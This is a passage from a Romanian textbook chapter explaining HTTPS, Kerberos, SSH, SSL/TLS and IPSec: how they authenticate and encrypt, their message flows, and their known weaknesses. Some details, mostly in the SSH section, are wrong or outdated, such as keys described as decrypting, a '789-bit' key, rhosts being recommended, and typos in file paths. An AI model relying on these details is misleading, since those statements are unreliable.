este posibil ca expeditorul și receptorul să utilizeze o cheie de sesiune pe care au convenit-o în
prealabil. Este disponibil de asemenea și un mecanism challenge/response.

12.1.4. HTTPS
HTTPS (Secure Hyper Text Transfer Protocol) este un protocol de comunicație destinat
transferului de informație criptată prin intermediul WWW, care a fost dezvoltat de Netscape
Communications pentru browserul Netscape Navigator în 1994 din necesitatea de a proteja de
intruşi transferul datelor prin HTTP. HTTPS nu este altceva decât HTTP „încapsulat” cu ajutorul
unui flux SSL/TLS - datele sunt criptate la server înainte de a fi trimise clientului. Pe scurt,
HTTPS = HTTP + SSL.
HTTPS este în acelaşi timp o metodă de autentificare a server-ului web care îl foloseşte, prin
intermediul „certificatelor digitale” - dacă certificatul este emis de o autoritate cunoscută, browser-
ul poate fi sigur că server-ul cu care comunică este ceea ce pretinde a fi.
Adresa URL HTTPS implicită utilizează portul TCP 443 (HTTP neprotejat utilizează portul
80). Pentru a pregăti un server web să manipuleze conexiunile https, administratorul trebuie să
obțină și să instaleze un certificat de cheie publică pentru acest server. TLS utilizează atât o schemă
de criptare asimetrică (pentru generarea unei chei secrete partajate), cât și o metodă simetrică
(pentru schimbul de date, criptată cu o cheie partajată). Certificatul de cheie publică confirmă faptul
că această cheie publică aparține proprietarului site-ului. Certificatul de cheie publică și cheia
publică în sine sunt trimise clientului la stabilirea unei conexiuni; cheia privată este utilizată pentru
a decripta mesajele de la client.

29
Este posibilă crearea unui astfel de certificat fără contactarea autorității de certificare. Aceste
certificate sunt semnate de ele însăși și se numesc auto-semnate (self-signed), însă fără a verifica
certificatul în alt mod (cum ar fi un apel către proprietar și verificarea sumelor de control ale
certificatului), o astfel de utilizare a HTTPS este supusă unui atac man-in-the-middle. Aproape toate
certificatele însă sunt verificate de o terță parte, astfel încât clienții să fie asigurați că cheia este
întotdeauna securizată.
HTTPS poate fi, de asemenea, utilizat pentru a autentifica clientul în scopul de a oferi acces
la server numai utilizatorilor autorizați. Pentru a face acest lucru, administratorul creează de obicei
certificate pentru fiecare utilizator și le încarcă în browser-ul fiecăruia din ei. Vor fi acceptate de
asemenea toate certificatele semnate de către organizațiile de încredere a serverului. Un astfel de
certificat conține de obicei numele și adresa de e-mail a utilizatorului autorizat, care sunt verificate
la fiecare conexiune pentru a verifica identitatea utilizatorului fără a introduce o parolă.
În HTTPS, lungimea cheii este de 40, 56, 128 sau 256 de biți pentru criptare. Unele versiuni
mai vechi ale browserelor utilizează lungimea cheii de 40 de biți (de exemplu versiunile IE de până
la 4.0), care se datorează restricțiilor de export în SUA, însă această lungime a cheii nu mai este
sigură. Multe site-uri moderne necesită utilizarea browserelor de noi versiuni, care susțin criptarea
cu o cheie de lungime de 128 de biți, pentru a asigura un nivel adecvat de securitate. Această
criptare face pentru un atacator foarte dificilă căutarea parolelor și a altor informații personale.
În mod tradițional, un singur site HTTPS poate funcționa pe o singură adresă IP. Pentru a
opera mai multe site-uri HTTPS cu certificate diferite, este utilizată o extensie TLS denumită Server
Name Indication (SNI).
Schema generală de funcționare a HTTPS constă în următoarele:
 atunci când se utilizează o conexiune https, serverul răspunde la conexiunea inițială,
oferind o listă de metode de criptare acceptate de serverul web;
 ca răspuns, clientul selectează o metodă de conectare;
 clientul și serverul fac schimb de certificate pentru a-și autentifica identitatea;
 atât serverul web, cât și clientul fac schimb de informațiile criptate după ce se
asigură că ambele utilizează aceeași cheie și conexiunea este închisă.

12.1.5. KERBEROS
Protocolul Kerberos a fost proiectat la Massachusetts Institute of Technology (MIT), în jurul
anului 1984 pentru a proteja serviciile de reţea oferite de proiectul Athena. Scopul protocolului
Kerberos era să extindă noţiunea de autentificare, autorizare şi contabilizare a mediului MIT.
Kerberos a fost proiectat pe baza modelului client-server și asigură autentificarea mutuală,
adică atât utilizatorul cât și serverul se autentifică unul față de celălalt. În terminologia Kerberos, un
domeniu administrativ se numeşte realm. Se presupune că orice companie sau organizaţie care
30
doreşte să ruleze Kerberos poate crea un realm identificat unic printr-un nume. Teoretic, Kerberos
poate suporta mai bine de 100.000 de utilizatori. El se bazează pe modelul client/server, iar
protocolul în sine constă dintr-un schimb de mesaje între un client şi o serie de servere, fiecare cu o
altă misiune.
Utilizatorii, clienţii şi serviciile de reţea instanţiate pe un host în particular se consideră în
mod tipic parteneri. Fiecare partener este identificat în mod unic de un identificator de partener,
care are în componenţă trei câmpuri, fiecare fiind un şir terminat cu null de până la 40 de caractere.
Aceste trei câmpuri sunt:
 numele partenerului, NAME;
 numele instanţei, INSTANCE;
 numele realm-ului, REALM.
Mesajele protocolului Kerberos sunt protejate împotriva atacurilor de ascultare
(eavesdropping) și de reluare a mesajelor (replay), scopul sistemului Kerberos fiind acela de a
permite unui client ce rulează în numele unui utilizator anume să se identifice unui serviciu sau unui
server de aplicaţii corespunzător, fără a se necesita trimiterea unor date secrete care ulterior să poată
fi folosite de un atacator la personificarea utilizatorului. Pentru a realiza acest lucru, modelul
Kerberos necesită existenţa unui terţ de încredere care serveşte ca centru de distribuţie a cheilor
(KDC) în realm-ul Kerberos. Kerberos utilizează tehnici simetrice de criptare și oferă un sistem de
mesaje criptate numite bilete (tickets), care asigură în mod securizat încrederea reciprocă dintre
două entități din rețea. Utilizând Kerberos, parolele nu mai sunt transmise prin rețea, nici măcar
criptate. În cazul în care un bilet Kerberos este interceptat acesta rămâne protejat deoarece este
criptat cu algoritmi robuști de criptare. Odată ce o entitate-client obține un bilet către un anume
server, biletul este păstrat pe calculatorul local până la expirare, făcând astfel din Kerberos un
sistem de autentificare foarte eficient. Depinde de implementare, dar în mod uzual un bilet Kerberos
expiră după opt ore. Fiecare entitate din rețea, fie client, fie server, deține o cheie secretă, cunoscută
doar de ea și de KDC. Această cheie constituie dovada identității unei entități. Pentru o comunicare
sigură între două entități din rețeaua publică, KDC generează o cheie a sesiunii. Pentru
implementarea protocolului Kerberos trebuie acordată o atenție deosebită stocării parolelor fiecărui
client, motiv pentru care serverul central trebuie să fie o maşină foarte sigură. KDC menţine o bază
de date cu informaţii despre fiecare partener din cadrul sistemului. Deoarece securitatea este foarte
importantă, această informaţie este redusă la un minim posibil pentru a efectua cu succes
autentificarea. Astfel, deşi baza de date Kerberos este la nivel de utilizator, aceasta nu conţine
informaţii cum ar fi numere de telefon sau adrese, neutilizate în mod curent la autentificare, ci
următoarele:
 identificatorul partenerului;

31
 cheia master Kp (sau parola dacă este utilizator);
 data expirării identităţii;
 data ultimei modificări a înregistrării;
 identitatea partenerului care a operat modificarea;
 timpul maxim de viaţă a biletelor emise partenerului;
 unele atribute;
 unele date interne de implementare invizibile la exterior cum ar fi versiunea cheilor,
versiunea cheii master sau indicatori către valori vechi ale înregistrării.
Cheia master (Kp) a fiecărui partener trebuie ţinută secretă, de aceea toate aceste chei
se codifică cu o cheie master a KDC. Pe lângă o protecţie sporită, această metodă permite
distribuirea bazei de date între servere fără riscul de a fi capturată de un potenţial atacator. Cheia
master KDC nu se păstrează în aceeaşi bază de date, ci se operează separat.
Un centru de distribuție a cheilor are două părți:
 un server de autentificare (Authentication Server - AS);
 un server de alocare a biletelor (Ticket Granting Server - TGS).
AS şi TGS sunt componente separate logic dar pot fi procese care rulează pe aceeaşi
maşină. Aceasta trebuie să fie protejată cu grijă şi securizată fizic, deoarece un intrus ar putea
compromite uşor întreg sistemul de la acest nivel. Un bilet este un certificat emis de KDC şi
criptat cu cheia master a serverului. Printre altele, un bilet conţine:
 cheia de sesiune care va fi utilizată pentru autentificarea între client şi server;
 numele partenerului către care cheia de sesiune a fost emisă;
 un timp de expirare după care cheia de sesiune nu mai este validă.
În procesul de funcționare a protocolului, sunt utilizate următoarele:
 serverul TGS (Ticket Granting Server) - oferă bilete de tip sesiune pentru accesarea altor
resurse. De obicei, TGS rulează în KDC;
 biletul TGT (Ticket Granting Ticket) reprezintă un jeton de validare a unui bilet Kerberos
care atestă faptul că o entitate a fost deja autentificată și ne asigură că utilizatorii nu mai
trebuie să reintroducă parola după un login inițial, până la expirarea biletului;
 biletul de sesiune ST (Session Ticket) reprezintă un jeton de sesiune care permite accesul la
resurse protejate. Pentru accesarea oricărei aplicații care utilizează Kerberos este necesar un
bilet de sesiune valid.
Pentru a realiza autentificarea protocolul Kerberos parcurge câteva etape:
1. Utilizatorul unui sistem client, utilizând un username și o parolă sau un smart card, se
autentifică față de server-ul de autentificare (AS din KDC). Clientul de login furnizează AS
numele, iar AS caută intrarea corespunzătoare utilizatorului în baza de date KDC.
32
2. Cu parola cerută de client utilizatorului se va cripta TGT. Dacă cheia derivată din parola
utilizatorului poate decripta cu succes TGT, acestuia i se permite accesul. Pe partea de
client, TGT-ul este memorat pentru folosire ulterioară şi anume pentru a obţine bilete pentru
autentificarea în servicii de reţea particulare. Scopul principal al TGT este deci să faciliteze
o singură autentificare pentru utilizatori. Parola este astfel cerută o singură dată, şi nu de
fiecare dată când se cere accesul la un serviciu.
3. Biletele sunt eliberate de TGS-ul specificat în TGT-ul primit de utilizator. Pentru a obţine un
bilet, clientul trimite o cerere către TGS.
4. Dacă TGS consideră atât biletul cât şi autentificatorul valid, biletul este returnat. Mesajul
include numele serviciului cerut, TGT-ul şi autentificatorul. Acesta din urmă este o
informaţie ce poate proba că a fost generată recent, utilizând cheia de sesiune de către client
şi server împreună. În particular, autentificatorul conţine numele utilizatorului, adresa de
reţea a clientului şi timpul curent, fiind criptat cu cheia de sesiune returnată în TGT.
Autentificatorul descurajează atacurile replay.
5. Clientul creează un alt autentificator şi îl trimite împreună cu biletul de serviciu serverului.
6. Dacă se cere autentificare reciprocă, serverul returnează un autentificator.
Aşa cum a fost menționat, modelul Kerberos nu oferă decât serviciul de autentificare. În
sine, el nu oferă informaţii despre autorizarea clientului în a folosi anumite servicii de reţea. În
general, sunt trei posibilităţi pentru atingerea problemei autorizării, şi anume:
 baza de date Kerberos ar putea conţine informaţii de autorizare pentru fiecare serviciu şi
să emită bilete doar utilizatorilor autorizaţi;
 un serviciu dedicat poate menţine informaţiile de autorizare prin liste de acces pentru
fiecare serviciu şi permiterea clientului să obţină certificate sigilate de apartenenţă la
listă; în acest caz clientul ar prezenta serviciului certificarea în locul biletului Kerberos;
 fiecare serviciu poate menţine propria informaţie de autorizare cu ajutorul opţional al
unui serviciu care stochează aceste liste de acces şi oferă certificări de apartenenţă la
listă.
Modelul Kerberos se bazează pe faptul că fiecare serviciu cunoaşte cu exactitate cine sunt
utilizatorii săi şi ce formă de autorizare este potrivită pentru aceştia. În consecinţă Kerberos
foloseşte cea de-a treia metodă. Pentru simplificarea implementării celei de a treia metode,
Kerberos foloseşte modelul de autorizare bazat pe liste de control al accesului. Orice serviciu care
consideră că i se potriveşte acest tip de autorizare poate încorpora o bibliotecă cu funcţii adecvate.
Utilizarea acestui model presupune că serviciul verifică dacă o identitate verificată aparţine unei
liste de acces.

33
Primele trei versiuni ale Kerberos au fost folosite doar în cadrul MIT, în prezent nemaifiind
folosite. Prima versiune făcută publică a fost Kerberos V4, versiune ce a cunoscut o răspândire
importantă în afara MIT. Deoarece unele medii necesitau funcţionalităţi neacoperite de Kerberos
V4, iar altele aveau o structură diferită de modelul MIT, în 1989 a început lucrul la Kerberos V5. În
septembrie 1993, Kerberos V5 a fost specificat ca standard Internet în RFC 1510. MIT a dezvoltat
şi testat Kerberos V5 pe Ultrix, SunOS, Solaris şi Linux, fiind portat şi pe alte sisteme de către terţi.
Deşi similare ca şi concept, Kerberos V4 şi V5 sunt substanţial diferite şi chiar sunt în competiţie
pentru dominaţia pe piaţă. Pe scurt, Kerberos V4 are o bază de instalare mai mare, este mai simplu
şi are o performanţă mai mare decât V5, însă lucrează doar cu adrese IP. Kerberos V5 pe de altă
parte, are o bază de instalare mai redusă, este mai complicat şi implicit mai puţin eficient, dar
prezintă mai multă funcţionalitate decât V4. În ciuda faptului că este disponibil codul sursă pentru
Kerberos V4 şi V5, MIT nu-l susţine oficial şi nu oferă suport. Unele companii însă oferă contra
cost versiuni comerciale de implementări Kerberos. Informaţii despre versiunile freeware şi
comerciale se găsesc în Kerberos FAQ publicat periodic în grupul de ştiri comp.protocols.kerberos.
Deşi Kerberos este foarte util şi mult folosit pentru autentificare, el are o serie de slăbiciuni:
 Kerberos este proiectat pentru autentificări utilizator-host şi nu host-host. Ca urmare,
folosirea acestui protocol de autentificare cere ca fiecare host să rețină cheile secrete
(master) KA ale tuturor celorlalte host-uri; însă se ştie că multe dintre ele reprezintă medii
foarte nesigure pentru memorarea pe termen lung a unor informații secrete. Dacă un intrus
ar fura o cheie primară, s-ar putea pretinde utilizator principal şi ar putea ataca orice server.
 O altă problemă este legată de bilet şi de cheia de sesiune. Din nou, calculatoarele multiuser
nu sunt bune pentru a păstra chei secrete în ele; oricine care poate citi o cheie de sesiune,
poate să o folosească pentru a se legitima drept o altă persoană. De asemenea, biletul poate
fi obținut prin ascultarea liniei şi, ca urmare, se pot obține accese la server-e fără drepturi
reale.
 Autentificatorii reprezintă şi ei o problemă vulnerabilă. Dacă host-ul nu ține o evidență a
autentificatorilor folosiți anterior, un intrus poate folosi un autentificator vechi, desigur însă
în limitele unor intervale de timp de expirare. De asemenea, se pot face anumite penetrări
făcând host-ul să aibă marcată o dată curentă mai veche.
 Cea mai importantă problemă o reprezintă modul în care se obține biletul inițial. Aceasta
deoarece cererea biletului pentru TGS nu conține în protocol nici un fel de informație de
autentificare, cum ar fi, de exemplu, numele cifrat al utilizatorului. Mesajul răspuns al lui
Kerberos este potrivit unui atac: un atacator situat la distanță în Internet poate să-şi
construiască o colecție de bilete cifrate şi poate să încerce un asalt cu ele. Ultima versiune a
protocolului Kerberos (v5) conține mecanisme pentru a preveni acest lucru.

34
 Kerberos nu rezolvă atacurile de tip “ghicire a parolei”. Dacă un utilizator a ales o parolă
simplă, atacatorul poate reuşi într-un atac de tipul celui cu dicționarul.
 Kerberos nu rezolvă problemele de atacuri la servicii. Astfel de protocoale sunt necesare
atunci când un intrus împiedică o aplicație să funcționeze în paşii de autentificare specificați.
Detectarea şi soluționarea unor astfel de atacuri – unele dintre lele părând a fi o defecțiune
obişnuită a sistemului – sunt lăsate în seama administratorului sau a utilizatorilor.

12.1.6. SSH
Secure Shell (SSH) este un protocol criptografic de rețea care permite ca datele să fie
transferate folosind un canal securizat între dispozitive dintr-o anumită rețea. Cele două mari
versiuni ale protocolului sunt SSH1 și SSH2. Protocolul SSH este folosit cu precădere în sistemele
de operare Linux, Unix și Windows. SSH a fost dezvoltat din dorința de a înlocui vechiul protocol
Telnet și al altor protocoale nesigure de acces de la distanță, care trimit informația, în special parola,
în text clar, făcând posibilă descoperirea ei prin analiza traficului. Criptarea folosita de SSH
intenționează să asigure confidențialitatea și integritatea datelor transmise printr-o rețea nesigură
cum este Internetul.
Scopul principal al protocolului SSH este de a îmbunătăți securitatea în rețea, încearcând să
facă acest lucru prin securizarea canalului prin care sunt transmise informațiile între participanți.
Pentru a asigura confidențialitatea și integritatea informațiilor interschimbate, SSH se folosește de
criptarea cu chei asimetrice. Utilizatorul deține o pereche de chei: una publică și una privată. În
timp ce cheia publică se trimite stației de la distanță cu care se dorește comunicarea, cea privată
rămâne tot timpul pe stația locală și trebuie protejată de public. Cheia publică trebuie trimisă stației
de la distanță pentru ca aceasta să o poată folosi la decriptarea datelor primite în format securizat.

Figura 12.1. Organizarea protocolului SSH

35
Protocolul SSH este format din trei componente majore (figura 12.1): Transport Layer –
protocol care prevede autentificarea serverului, confidențialitatea și integritatea perfectă a
secretului. La nivelul acestui strat, dacă utilizatorul are o cheie care a fost compromisă din diverse
motive aceasta nu afectează securizarea sesiunilor anterioare. User Authentication – protocol care
autentifică clientul care dorește să folosească tunelul în conexiunea cu serverul. Connection
Protocol – acest protocol multiplexează tunelul criptat în mai multe canale logice. Aceste canale
sunt deasupra conexiunii SSH.
Comunicarea dintre client și server folosind protocolul SSH se realizează parcurgând câțiva
pași:
1. primul pas constă în autentificarea clientului spre server. Întotdeauna clientul este cel
care inițiază conexiunea; După ce serverul este autentificat, iar clientul este sigur de
identitatea serverului, se formează un canal securizat simetric între client și server care
va fi utilizat pentru schimbul de chei, parole și alte lucruri;
2. se realizează conexiunea TCP spre portul 22 ( port oficial asignat protocolului SSH); la
acest pas clientul obține informații referitoare la versiunea protocolului suportată de
server și versiunea protocolului SSH; în cazul în care clientul nu suportă versiunea SSH
a serverului conexiunea va înceta;
3. după decizia clientului de a continua conexiunea se trece la Protocolul Binary Pacher,
protocol care conține un pachet cu o lungime de 32 biți;
4. la pasul următor serverul preia inițiativa și trimite clientului identitatea sa, sub forma
unei chei publice; această cheie este creată în timpul instalară serverului openssh.
5. în cazul în care clientul realizează pentru prima dată conexiunea cu serverul respectiv,
acesta va fi informat printr-un mesaj de avertizare despre identitatea serverului (unele
programe permit înregistrarea acestei identității în memoria chase);
6. clientul mai primește o informație referitoare la cheia serverului; această cheie este
regenerată la fiecare oră; dimensiunea standard a cheii este de 789 biți;
7. clientul trimite un răspuns serverului prin procedeul denumit checkbytes 8 biți, iar la
final serverul furnizează clientului informațiile despre metoda de criptare și informațiile
despre autentificare;
8. în funcție de lista cu algoritmi de criptate suportată de server, clientul va crea o cheie
simetrică pe care o va trimite serverului; aceasta cheie simetrică va fi folosită pentru
procesul de criptare și decriptare a datelor trimise prin canal în timpul sesiunii; tot la
acest pas clientul va executa o dublă criptare; prima criptare este realizată de serverul
gazdă iar a doua criptare este executată de cheia serverului, astfel se asigură nivelul de

36
securitate optim, deoarece în cazul în care cheia de la serverul host este compromisă
mesajul tot nu va putea fi descifrat fiind păstrat în siguranță de a doua criptare;
9. după dezvăluirea identității serverului către client, a venit momentul ca clientul să se
autentifice pe server; după ce clientul trimite cheia dublă criptată va așteaptă mesajul de
confirmare venit din partea serverului, mesaj care confirmă faptul că serverul este
capabil să decripteze informațiile primite de la client;
10. autentificarea clientului este realizată într-un canal criptat; există mai multe metode care
pot fi utilizate de client în vederea autentificării: cheia publică, parola sau rhosts:
a. cheia publică – aceasta este considerată de protocolul SSH cea mai puternică
metodă de autentificare; se creează o cheie publică și se trimite spre server; după
recepționarea serverului a cheii publice generate de către client va genera un șir
de 256 de biți pe care îl va trimite clientului; clientul se va folosi de cheia privată
pentru a decripta șirul trimis de server iar apoi va genera o valoare hash md5 pe
care o va trimite serverului; dacă server-ul va decripta valoarea trimisă de client
autentificarea este realizată cu succes;
b. parola – este cea mai folosită metodă de autentificare în protocolul SSH; clientul
trimite serverului o parola (care este criptată cu ajutorul cheii simetrice), iar dacă
mecanismul de autentificare al serverului recunoaște parola, clientului îi este
aprobat accesul conexiunii;
c. rhosts – această metodă este recomandată dacă se dorește „trecerea cu vederea”
verificarea parolei; se utilizează fișierul /.ssh/hnown_hosts pentru autentificarea
serverului și fișierul /.rhosts pentru autentificarea clientului; în cazul setării
prealabile a acestor fișiere se elimină în bună măsură furnizarea parolei în mod
interactiv.

12.2. Protocoale la Nivelul Transport


În acest compartiment vom analiza protocoalele TLS și SSL care, de fapt, nu se potrivesc
perfect niciunui nivel al modelului OSI sau al modelului TCP/IP. Ele rulează „deasupra” unui
anumit protocol de transport fiabil (de ex. TCP), ceea ce ar însemna că acesta se află deasupra
nivelului Transport. Aceste protocoale servesc pentru criptare în nivelurile superioare, ceea ce este,
în mod normal, funcția nivelului Prezentare. Cu toate acestea, aplicațiile folosesc în general TLS ca
și cum ar fi un nivel Transport, chiar dacă aplicațiile care utilizează TLS trebuie să controleze în
mod activ inițierea de „strângere de mână” TLS și manipularea certificatelor de autentificare
schimbate.
SSL (Secure Sockets Layer) este un acronim care reprezintă un protocol criptografic
dezvoltat de compania Netscape pentru a realiza conexiuni protejate în rețelele de calculatoare.
37
Câteva versiuni ale protocoalelor își găsesc aplicații pe scară largă în navigarea pe Internet, e-mail,
fax prin Internet, mesagerie instantanee și voce-over-IP (VoIP). Site-urile web pot utiliza TLS
pentru a asigura toate comunicările dintre serverele lor și browserele web.
Pentru a cripta datele, SSL utilizează un sistem criptografic cu două chei: una publică și una
privată. Au fost oferite mai multe actualizări ale prezentului protocol, astăzi versiunea cea mai nouă
fiind SSL 3.0, devenită la timpul ei standard. Versiunea 3.0 este suportată de majoritatea serverelor
web, însă începând cu anul 2014, această versiune a SSL este considerată nesigură deoarece este
vulnerabilă la atacul POODLE care afectează toate cipurile pe blocuri din SSL. Chiar și RC4,
singurul cifru non-block suportat de SSL 3.0, este, de asemenea, posibil de spart. SSL 3.0 a fost
interzis oficial începând cu luna iunie 2015.
TLS (Transport Layer Security) este succesorul protocolului SSL. Chiar dacă există anumite
diferențe între TLS și SSL, protocoalele sunt foarte asemănătoare. Obiectivul protocolului TLS este
de a opri interceptarea “mesajului fals”, acesta oferind un pachet complect de securitate
criptografică între informațiile confidențiale transmise între servere. Două mari avantajele ale
protocolului TLS sunt independența și transparența.
Scopul principal al protocolului SSL/TLS este de a oferi intimitate și fiabilitate între două
aplicații care comunică între ele. SSL/TLS criptează datele cu caracter sensibil ale utilizatorului
atunci când sunt trimise spre un server web de-a lungul unei rețele nesigure. Protocolul SSL/TLS
este compus din două nivele. Primul nivel, denumit Handshake protocol (strângere de mână),
conține la rândul său alte trei subprotocoale: Handshake, Change Cipher Spec și Alert. Al doilea
nivel este definit de protocolul Record.
Mai jos urmează o descriere succintă a subprotocoalelor din Handshake protocol.
Handshake – este folosit pentru schimbul de informații inițiale dintre client și server.
Informațiile schimbate între client și server constă în ID-ul de sesiune, certificarea peer,
specificațiile cifrului, algoritmul de compresie utilizat și informația confidențială care este folosită
pentru a genera o cheie.
Change Cipher Spec – este folosit pentru a partaja informațiile criptate între client și server.
Acesta transmite informații în cealaltă parte a sesiunii SSL/TLS referitoare la modul de trimitere a
unui nou set de chei criptografice.
Alert – reprezintă mesaje de alertă care indică o schimbare a statutului sesiunii sau o stare de
eroare. Există o mare varietate de alerte care notifică clientul sau serverul web implicat în sesiunea
SSL/TLS despre modul și condițiile de funcționare. Alertele sunt trimise de obicei atunci când
conexiunea este închisă, nu este primit un anumit mesaj, sau nu poate fi decriptat un alt mesaj.
Protocolul Handshake folosește certificatul x509 pentru procesul de autentificare, certificat
care oferă „dovezi” despre identitatea părții care deține certificatul precum și despre cheia privată

38
corespunzătoare. Astfel de certificate digitale sunt eliberate de o autoritate de sine stătătoare.
Certificatele conțin perioada de valabilitate, cheia publică, semnătura digitală și numărul de serie
distinct. Autoritatea CA confirmă identitatea solicitantului, iar mai apoi îi emite acestuia certificatul
digital solicitat. De asemenea autoritatea poate reînnoi sau revoca un anumit certificat digital.
Protocolul SSL/TLS folosește două tipuri distincte de criptări: cu cheie secretă și cu cheie
publică. Cheia secretă se folosește în cazul criptării unor cantități mari de date, deoarece criptarea și
decriptarea este mult mai rapidă față de criptarea cu cheie publică. Cheia publică este folosită pentru
criptarea unei cantități mici de date, de exemplu – a cheii private.
Protocolul record (protocol de înregistrare) primește și criptează toate datele provenite din
nivelul Aplicație și îl pregătește pentru expedierea în următorul nivel (nivelul Transport). Datele
sunt prelucrate, iar mai apoi fragmentate în dimensiuni apropiate algoritmului de criptare, li se
atribuie adresa unică MAC, iar mai apoi sunt criptate (sau decriptate) folosind informațiile care au
fost negociate în timpul protocolului Handshake.

Figura 12.2. Organizarea protocolului SSL/TLS


Organizarea interna a protocolului TLS/SSL și modul de funcționare al acestuia este
prezentată în figura 12.2.
Comunicarea dintre client și server folosind protocolul SSL/TLS. Protocolul SSL permite
schimbul de înregistrări; fiecare înregistrare poate fi, în mod opțional, compresată, criptată și
asignată cu un cod de autentificare al mesajului (MAC). Fiecare înregistrare are un câmp numit
content_type care specifică care protocol este folosit. Când conexiunea demarează, nivelul
înregistrare încapsulează un alt protocol, de tip handshake protocol, pentru care câmpul
content_type are valoarea 22.

39
Figura 12.3. Comunicarea dintre client și server cu ajutorul protocolului SSL/TLS

Clientul trimite și primește mai multe structuri de handshake (figura 12.3):


 trimite un mesaj ClientHello în care specifică lista de metode de criptare care sunt
suportate, metodele de compresie și cea mai actuală versiune a protocolului cunoscută;
de asemenea transmite o secvență aleatoare de biți care va fi folosită ulterior;
 primește mai apoi un ServerHello, în care serverul alege parametrii conexiunii din
mulțimea de opțiuni oferită de client mai devreme;
 când parametrii conexiunii sunt cunoscuți, clientul și serverul schimbă certificatele (în
funcție de algoritmul de codare ales pentru chei publice); aceste certificate sunt în
prezent de tip X.509, dar există de asemenea un document care specifică utilizarea
certificatelor bazate pe OpenPGP;
 Serverul poate solicita un certificat clientului, astfel încât conexiunea să fie mutual
autentificată;
 clientul și serverul negociază un secret comun numit “master secret”, existând aici
opțiunea folosirii rezultatului schimbului Diffie-Hellman sau, mai simplu, prin criptarea
secretului cu cheia publică a partenerului și decriptarea acesteia cu cheia privată
respectivă; toate datele legate de chei sunt derivate din acest “master secret” (și din
valori generate aleator de către client sau de către server utilizând “funcții
pseudoaleatore”).
TLS/SSL au o varietate de măsuri de securitate:
 numerotarea tuturor înregistrărilor cu numere de secvență în MAC-uri;

40
 folosirea unui mecanism de sumarizare a mesajului extins prin folosirea unei chei
(pentru ca numai dacă se cunoaște cheia să poți verifica MAC; acest lucru este specificat
în RFC 2104);
 protecție împotriva unor tipuri cunoscute de atacuri (incluzând atacuri de tip “man-in-the
middle”), precum cele de tip forțare la folosirea a unor versiuni mai vechi (și mai puțin
sigure) ale protocolului, sau versiuni mai puțin sigure ale algoritmilor de codare;
 mesajul care încheie handshake (“Finished”) care trimite un hash tuturor datelor
schimbate între cele două părți;
 funcțiile pseudoaleatore împart datele în două jumătăți și le procesează cu doi algoritmi
diferiți de hash (MD5 și SHA), și apoi se face un XOR între ele; în acest fel se
protejează și de cazurile în care pentru unul dintre acești doi algoritmi se găsește o
vulnerabilitate;
Versiunea curentă a protocolului este TLS 1.2, însă este în proces de finisare o nouă
versiune - TLS 1.3.
În versiunea curentă a protocolului sunt disponibili următorii algoritmi:
 pentru schimbul cheilor și verificarea autenticității acestora, se utilizează combinații de
algoritmi: RSA, Diffie-Hellman, DSA, ECDSA;
 pentru criptare simetrică: RC4, IDEA, Triple DES, SEED, Camellia sau AES;
 pentru funcțiile hash: MD5, SHA, SHA-256/384.
Algoritmii pot fi suplimentați în funcție de versiunea protocolului. Până la versiunea TLS
1.2 au fost de asemenea disponibili algoritmii de criptare simetrică RC2, IDEA, DES, însă ei au fost
eliminați ca fiind nesiguri.

12.3. Protocoale la Nivelul Rețea

12.3.1 IPSec
IPSec (Internet Protocol Security) este o suită de protocoale pentru securizarea
comunicațiilor peste stiva TCP/IP. Această suită se bazează pe folosirea funcțiilor matematice și a
algoritmilor de criptare și autentificare pentru a asigura confidențialitatea, integritatea și non-
repudierea informațiilor din fiecare pachet IP transmis pe rețea. IPSec este la ora actuală una dintre
cele mai folosite metode de securizare a transmisiei pe Internet, alături de SSL și TLS. Spre
deosebire de acestea, protocoalele IPSec se regăsesc la nivelul 3 al stivei TCP/IP și la nivelul 3 al
stivei ISO-OSI, ceea ce face posibilă securizarea tuturor aplicațiilor care folosesc stiva TCP/IP.
IPSec are o arhitectură de tip end-to-end, compatibilă atât cu stiva IPv4, cât și cu IPv6, unde
integrarea funcțiilor de securizare este nativă, încă de la proiectarea stivei pe 128 de octeți.
Un router sau un server pe care sunt activate protocoalele de securitate IPsec se numește
poartă de securitate (securițy gateway) sau paravan de protecție (firewall). În general, asigurarea
41
securității unei transmisii se realizează la ambele capete ale căii de comunicație, cu două
echipamente care folosesc IPSec lucrând în pereche (IPsec peers). Prin suita IPSec pot fi securizate
comunicațiile între două sau mai multe calculatoare independente, între două sau mai multe
subrețele aflate fiecare în spatele unui gateway care se ocupă de folosirea funcțiilor criptografice
pentru fiecare subrețea aflată în administrarea sa, precum și între un calculator independent și o
subrețea aflată în spatele unui gateway. IPSec se bazează pe proprietățile criptografice ale unor
modele precum Diffie-Hellman, RSA sau DSA și a algoritmilor de criptare și autentificare, cum
sunt 3DES, AES, SHA1, SHA2.
IPsec oferă următoarele servicii de securitate pe nivelul IP al rețelelor TCP/IP:
 integritatea conexiunii - asigură faptul că în procesul de comunicație nu intervin entități
neautorizate care să modifice datele sau să genereze mesaje false în rețea;
 autentificarea sursei de date - permite identificarea sursei și asigurarea autenticității
mesajelor;
 criptarea datelor - asigură confidențialitatea mesajelor transmise și imposibilitatea preluării
neautorizate a informațiilor;
 protecția la atacuri în rețea - detectează pachetele repetitive, replici ale aceluiași pachet,
care se transmit la infinit în rețea și pot produce blocaje sau saturarea rețelei (flooding).
În cadrul IPsec autentificarea sursei se face pe baza protocolului AH (Authentication
Header) din suita IPsec (RFC 2401, RFC 2402). Acest protocol asigură autenticitatea mesajelor și a
tuturor informațiilor adiționale incluse în pachet precum și integritatea pachetului de date, prin
aplicarea funcților hash. AH împiedică modificarea ilegală a pachetelor, multiplicarea sau
întârzierea datelor (antireplay security). Pe lângă protocolul AH, există și protocolul ESP
(Encapsulating Security Payload) care asigură autenticitatea, integritatea și confidențialitatea
pachetelor de date. Spre deosebire de protocolul AH, antetul pachetului IP nu este protejat de ESP,
acesta oferind servicii de securitate numai protocoalelor de pe nivelele superioare.
Confidențialitatea datelor este asigurată prin criptare. Protocoalele AH și ESP pot fi implementate
prin diverși algoritmi software și se pot aplica fie individual, fie simultan, în funcție de gradul de
securitate impus pachetelor IP (RFC 2403, RFC 2404). Stabilirea protocoalelor poate avea loc static
sau dinamic. Denumirea oficială a stabilirii statice este manual keying. Metoda dinamică de stabilire
a asocierilor de algoritmi și chei este numită ISAKMP (Internet Security Association and Key
Management Protocol), descrisă în RFC 2408. Pe baza mecanismului ISAKMP/TKE se generează
și se transmit între părți cheile de criptare utilizate de SA (Security Association) în diferite sesiuni,
memorate într-o bază de date proprie ISAKMP ca atribute ale SA. În rețelele TCP/IP, se utilizează
